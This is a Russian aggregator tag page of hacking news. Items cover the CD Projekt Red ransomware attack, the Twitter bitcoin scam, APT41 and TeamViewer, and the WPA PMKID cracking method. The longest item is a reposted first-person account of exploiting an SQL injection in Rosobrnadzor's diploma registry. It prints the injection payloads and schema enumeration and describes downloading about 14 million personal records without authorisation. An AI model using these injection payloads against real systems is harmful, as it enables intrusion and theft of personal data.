взлом

Подписчиков: 4     Сообщений: 191     Рейтинг постов: 2,105.7

Игры Witcher 3 The Witcher фэндомы CD Projekt RED Разработчики игр хакеры взлом Cyberpunk 2077 gwent 

CD Projekt Red подверглись хакерской атаке

СD Projekt Red сообщили в твиттере, что их сервера были взломаны и неизвестные хакеры зашифровали все их данные и требуют связаться с ними в течении 48 часов (видимо, чтобы обсудить выкуп). 

Yesterday we discovered that we have become a victim of a targeted cyber attack, due to which some of our internal systems have been compromised.
An unidentified actor gained unauthorized access to our internal network, collected certain data belonging to CD PROJEKT capital group, and left a

Перевод официального сообщения:
"Вчера мы обнаружили, что стали жертвой кибер-атаки, из-за которой некоторые наши внутренние системы были взломаны.

Неизвестные получили доступ к нашей внутренней сети, собрали определенные даные принадлежащие CD PROJEKT capital, и оставили записку о выкупе, которую мы выложили публично. Несмотря на то, что некоторые наши данные были зашифрованы, наши бэкапы в порядке. Мы уже наладили нашу IT инфраструктуру и начали восстановление данных.

Мы не будем вести переговоре о выпупе с неизвестным, и мы понимаем, что это может привести к публикования украденных данных. Мы предпринимаем необходимые шаги для предотвращения последствий подобной публикации, в частности мы связываемся с другими компаниями, которые могут быть задеты этим взломом.

Мы все еще расследуем этот инцидент, но на данный момент мы можем подтвердить, что насколько мы знаем - взломанные системы не содержали никаких персональных данных наших игроков или пользователей наших сервисов.

Мы уже связались с властями, включая представителей закона и Президента Офиса Защиты Персональных Данных, а также специалиство по IT отслеживанию, и мы будем тесно с ними сотрудничать, чтобы полностью расследовать этот инцидент."

Также CDPR приложили предполагаемую записку от взломщиков:

m read_me_unlock - Notepad File Edit Format View Help
□
X
0
!!!!!!!!!!!!!!!!!! Hello CD PRODEKT !!!!!!!!!!!!!!!!!!
Your have been EPICALLY pwned!!
We have dumped FULL	copies of the source codes from your Perforce server for Cyberpunk 2077, Witcher 3, Gwent and the unreleased	version of

Если вкратце: хакеры говорят, что получили доступ к коду Киберпанка 2077, Ведьмака 3, Гвинта и невыпущенной версии Ведьмака 3. Также они скопировали бугалтерские, административные, юридические, кадровые и инвестроские документы. Они угрожают, что если не придут к соглашению, то выпустят это все онлайн и отправят все деликатные документы игровым журналистам.
Развернуть

twitter взлом Elon Musk bill gates Keny West Взлом твиттера 

Прямо сейчас происходит самый большой взлом в истории интернета.
В твиттере разом, одновременно, были взломаны страницы Джо Байдена, Кэни Уэста, Илона Маска, Билла Гейтса и еще с десятка других около-известных пользователей.

Везде текст шел одинаковый, с просьбой перевести деньги на ВТС-кошелек. Естественно тысяч людей схавали и перевели.

Сейчас твиттер заблокировал возможность постить всем верифицированным пользователям с синими галочками, что бы избежать дальнейших потерь.

Интересный факт: не был взломан аккаунт Дональда Трампа, или любой другой аккаунт, любого другого республиканского политика.

Рассматриваются теории разной степени шизоидности: от причастности Китая, АНБ до возможной связи с публикацией Максвелл по делу Эпштейна.
I^ @JoeBiden
Joe Biden 0
I am giving back to the community.
All Bitcoin sent to the address below will be sent back doubled! If you send $1,000,1 will send back $2,000. Only doing this for 30 minutes.
bc1qxy2kgdygjrsqtzq2n0yrf2493p8
3kkfjhx0wlh
Elon Musk o	\/
Feeling greatful, doubling all
Развернуть

Отличный комментарий!

Как это было
Йокалэмэнэ Йокалэмэнэ 16.07.202004:11 ссылка
+38.8

игры на ПК Red Dead Redemption 2 Red Dead Redemption Игры codex взлом гифки 

Развернуть

TeamViewer хакеры взлом 

Хакерская группа APT41 взломала программу TeamViewer

На конференции по безопасности Cyber Defense Summit 2019 специалисты по безопасности из компании FireEye официально подтвердили взлом популярного приложения TeamViewer с обходом 2FA. На протяжении 2017-2018 годов хакерская группировка APT41 использовала его как точку входа для проведения многочисленных атак. Они они потенциально получили доступ ко всем компьютерам в мире, на которых установлен TeamViewer.

Полная версия тут:
https://habr.com/ru/company/itsumma/news/t/472348/
TeamViewer
1 Remote software that enables remote control, desktop sharing and file transfer between systems
Entrypoint in multiple intrusions, 2017-2018
- Dropped HIGHNOON + CROSSWALK Anonymized TeamViewer Access Event:
allowed
2017/07/04
2017/07/04
2017/07/04
2017/07/04
2017/07/04
Развернуть

политика Павел Дуров Общественные деятели Знаменитости взлом телеграм журналисты Екатеринбург Россия 

Дуров обвинил российские власти во взломе Telegram уральских журналистов.

Сегодня российские власти попытались взломать [аккаунты] четырёх журналистов, которые освещали протесты в Екатеринбурге. К счастью, попытки провалились благодаря двухэтапной аутентификации. Павел Дуров,политика,политические новости, шутки и мемы,Павел Дуров,Общественные
Развернуть

geek сосед дядя Коля взломает ВиФи Вождь где https??? wi-fi it взлом 

Новая методика упрощает взлом паролей WPA и WPA2 в сетях 802.11i/p/q/r

Дженс Стьюб (Jens Steube), автор известного инструмента для взлома паролей, Hashcat, рассказал об обнаружении нового, более быстрого способа взлома паролей от беспроводных сетей. Новая методика была обнаружена практически случайно, когда Стьюб и его коллеги искали слабые места в WPA3.


Ранее подобные атаки предполагали, что атакующему придется ждать нужного момента, когда кто-нибудь выполнит вход в сеть, и будет осуществлено четырехстороннее рукопожатие EAPOL, в ходе которого клиент и роутер воспользуются PMK (Pairwise Master Key) и убедятся, что им обоим известен Pre-Shared Key (PSK). Задачей атакующего было поймать этот момент и перехватить рукопожатие.


Но исследователи обнаружили, что для WPA и WPA2 в сетях 802.11i/p/q/r все может быть проще. Новая атака базируется на использовании RSN IE (Robust Security Network Information Element) и его извлечения из единственного кадра EAPOL. Фактически, атакующему нужно лишь предпринять попытку аутентификации в беспроводной сети, извлечь PMKID из одного кадра, а затем, имея на руках данные RSN IE, можно приступать к взлому Pre-Shared Key (PSK).


t> Frame 70: 173 bytes on wire (1384 bits), 173 bytes captured (1384 bits) on interface 0 t> Radiotap Header v0. Length 18 t> 802.11 radio information t> IEEE 802.11 QoS Data, Flags: ____R.F. t> Logical-Link Control * 802.IX Authentication Version: 802.1X-20O4 (2) Type: Key (3) Length: 117


К примеру, для этого можно использовать тот же Hashcat. Исследователи отмечают, что в среднем взлом пароля занимает 10 минут, но все зависит от его сложности.


Quote: hashcat (v4.2.0) starting... OpenCL Platform #1: NVIDIA Corpcraticn * Device #1: GeForce GTX 1080, 2023/8112 MB allccatable. 20MCU * Device #2: GeForce GTX 1080, 2029/8119 MB allocatabie. 2 0MCU * Device #3: GeForce GTX 1080, 2029/8119 MB allccatable, 20MCÜ * Device #4: GeForce GTX


«Так как в данном случае PMK тот же, что и во время обычного четырехстороннего рукопожатия, это идеальный вектор атаки. Мы получаем все необходимые данные из первого же кадра EAPOL», — пишет Стьюб.


Пока специалисты не сообщают, какие роутеры, каким именно производителей уязвимы к такому вектору атак. Скорее всего, проблема актуальная для всех «современных маршрутизаторов» со включенными функциями роуминга, которые работают с IEEE 802.11i/p/q/r  .


Источник: https://xakep.ru/2018/08/07/802-11-pass-hack/

Развернуть

tokafan Комиксы взлом бонус в комментариях 

• •
штнвта.,tokafan,Смешные комиксы,веб-комиксы с юмором и их переводы,взлом,бонус в комментариях
Развернуть

Final Fantasy XV Final Fantasy Игры взлом 

Из-за ошибки разработчиков Final Fantasy XV взломана повторно со всеми DLC

Разработчики Final Fantasy XV снова сели в лужу. Согласно информации, появившейся на Reddit, разработчики случайно на 24 секунды выложили новейший билд игры в Steam без защиты Denuvo и без пароля, чем не преминули воспользоваться хакеры. В результате игра была повторно взломана, на этот раз со всеми патчами и DLC. Все, что нужно, это скачать небольшое обновление размером 230 мегабайт, и вы получите полную функционирующую Steam-версию Final Fantasy XV. Однако после обновления игру придется начинать заново, так как сохранения с прошлой версии работать не будут. 
 
Развернуть

Отличный комментарий!

Фига се, самая быстрая рука интернет морей
Glukovirus Glukovirus 13.03.201823:04 ссылка
+43.0

взлом информационная безопасность sql длиннопост geektimes habrahabr текст много букв СНИЛС дыра ...story PostgreSQL obrnadzor инн рособрнадзор 

"И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках"

"https://habrahabr.ru/post/347760/"


Одиноким вечером, глядя на свою пустую зачётку и осознавая, что конец близок, я снова задумался о том, как бы мне сейчас собрать сумку, или даже просто рюкзак, положить туда рубашку, шорты и свалить в тёплую страну. Было бы хорошо, да вот с дипломом живётся намного лучше. Во всяком случае, мне всегда так говорят.

Также часто слышал много историй про людей, которые приходили на собеседования с красными дипломами МГУ, но при этом абсолютно не разбирались в своей специальности, а потом на корпоративах признавались, что диплом у них купленный.

Но времена сейчас другие, сейчас 21 век, век больших возможностей, любой работодатель, который умеет пользоваться мышкой и знает, как выглядит браузер на рабочем столе, может проверить данные диплома. Каждый диплом, который выдаётся учебным заведением, теперь регистрируется в едином реестре, доступ к которому есть у каждого через сайт Федеральной службы по надзору в сфере образования и науки.


ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ ОБРАЗОВАНИЯ И НАУКИ
РОСОБРНАДЗОР,взлом,информационная безопасность,sql,PostgreSQL,длиннопост,geektimes,habrahabr,текст,Истории,obrnadzor,много букв,рособрнадзор,СНИЛС,инн,дыра



Для получение информации о документе об образовании достаточно просто заполнить форму, передвинуть слайдер и нажать кнопку. Вам либо покажут информацию о документе, либо скажут, что такого нет (но ещё рано обвинять соискателя в обмане, мало ли, что могло произойти).


Для поиска введите точные значения реквизитов, указанные на бланке документа: Более подробно о работе с данным сервисом можно ознакомиться по ссылке
Уровень образования
Не выбрано
Уровна* обрио
Наименование 00: Фамилия обладателя документа: Серия бланка: Номер бланка Дата выдачи:
О Найти 00



Ну и пока я смотрел на эту форму, решил я с ней поиграться. Повводил всякой чепухи, и бац — на поле, в которое было введено 1', я получаю такой response:

<h2>Произошла ошибка</h2><p>SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "4"LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U... ^</p>


Голый SQL Injection. Очевидно, что задачи продумать обработку ошибок перед разработчиком не было. Задача была сделать сервис, который работает. Сервис, который является гарантом. Так одинокий вечер превратился в весёлую одинокую ночь.


Ещё будучи подростком я очень любил всякие крутые истории про хакеров, а после того, как решил заняться программированием, изредка почитывал и интересные статьи по взлому и прочему. Так что то, что нужно делать дальше — я знал.

Так как разработчик этого сервиса дал нам удовольствие видеть ещё и часть запроса, то мы можем с уверенностью предположить, что это SELECT запрос. Теперь нам нужно как-то обнулить действие запроса, записанного в php-скрипте, а потом с помощью переменной вставить свой.

Для обнуления запроса достаточно просто добавить невозможное условие и закомментировать последующие строки запроса, что-то наподобие:

Инъекция

...me) = UPPER('1') AND (1=0)) — ')) AND (doc.education_level_id = '4') AND (U…


В ответ просто пришло сообщение о том, что документ не найден.

Также пробовал использовать вместо невозможного условия, наоборот, очевидные. А именно пробовал искать какой-либо документ по id. Писал id=1, id=1024 и прочее, но результатов не дало. Видимо, id давно перевалило за тысячи (спойлер: за миллионы).

Также я совершенно не надеялся на то, что запрос придёт без ошибки. Я был уверен, что пробелы будут экранироваться, удаляться, запрещаться, ещё что-нибудь. Ведь в форме на странице поиска ввести фамилию с пробелами невозможно. Но всё оказалось в разы проще.

Ну а теперь бы хотелось вытащить что-то действительно интересное. Изменить структуру ответа мы не можем никак, то есть если в запросе были, например, SELECT id, name, count, то так оно и останется. Значит надо подстраиваться, а для начала понять, какие же данные запрашиваются из БД, и, главное, сколько? Существует много способов узнать количество полей, но мне помог только ORDER BY. Как это работает?

ORDER BY сделан для сортировки, но его синтаксис не требует обязательно указывать имя поля, достаточно указать его позицию в запросе. Если указать номер позиции больше, чем количество запрашиваемых полей — то будет ошибка. Методом перебора можно подобрать количество полей. Их оказалось 55.

Хочется понять, с чем же мы работаем, что это за база данных такая? Предположим, что это MySQL, в MySQL есть функция Version(), которая возвращает версию БД. Применим:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,version(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…


В ответ пришёл JSON, в котором было:

PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit
Отлично, мы знаем систему, версию БД (под неё вроде даже эксплоиты были). Поле для действия расширилось. Узнаём, как выглядит запрос:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,current_query(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…


Ответ:
"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

Вся картина перед нами.

Попробуем узнать, что же за таблицы есть во всей базе данных:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,table_name,тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.tables — ')) AND (doc.education_level_id = '4') AND (U…


Таким образом получили все таблицы. Узнаём столбцы каждой таблицы следующим образом:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,CONCAT(column_name,' ',data_type,' ',is_nullable),тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.columns WHERE table_name='Какое-то имя таблицы' — ')) AND (doc.education_level_id = '4') AND (U…


Итак, зная структуру базы данных, я написал скрипт на Питон и выкачал все самые интересные на мой взгляд данные. А именно:

Таблицу с дипломами об образовании (серия, номер, год поступления, год окончания, СНИЛС!, ИНН!!, серия и номер паспорта (честно говоря, у всех записей поля пустые, но сам факт!), дата рождения, национальность (зачем?), учебная организация, выдавшая документ), таблицу с гражданами с образованием (там всё проще: ФИО и всё), таблицу с пользователями системы (стандартно, логин, email, и, НЕОЖИДАНО, md5 хэш пароля, хоть не сам пароль), отдельная таблица admin с одной записью (так же: логин, хэш пароля и прочее), таблица с информацией об учебных заведениях (кто начальник, email, телефон, лицензия — в общем всё, что и так есть в открытом доступе) и ещё кучу вспомогательных таблиц.

По объёмам получилось: около 14 000 000 документов об образовании, около 14 000 000 записей с данными о бывших студентах, 1322 пользователя системы, 1 админ, который логинится по будням в системе, видимо, когда на работу приходит, 3391 учебное заведение и горы непонятной информации типа ОКОГУ и прочее. База весом 5 гб.

А теперь представьте, сколько времени это качалось. Вы думаете, кто-то заметил? Может быть сервис резко отключился, ip заблокировали или ещё что-то? НЕТ!

Конечно, целью не является использовать эту информацию в корыстных целях (да я и не представляю, как). Иначе бы я не писал статью здесь. Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием, хватило истории про Микротех.

Дополнительно решил проверить хэши по радужным таблицам. Не уверен, конечно, что они хэшировались именно голым md5, но, во всяком случае, в открытых базах данных совпадений ни к одному хэшу не нашлось. Или я что-то не умею.

Мог бы я продолжить и получить доступ в систему? Смог бы я сам изменять записи и добавлять свои? Вполне возможно, но я решил этого не делать. Да и сессию надо закрывать, без диплома-то никак…


Развернуть

гифки машина взлом 

Развернуть
В этом разделе мы собираем самые смешные приколы (комиксы и картинки) по теме взлом (+191 картинка, рейтинг 2,105.7 - взлом)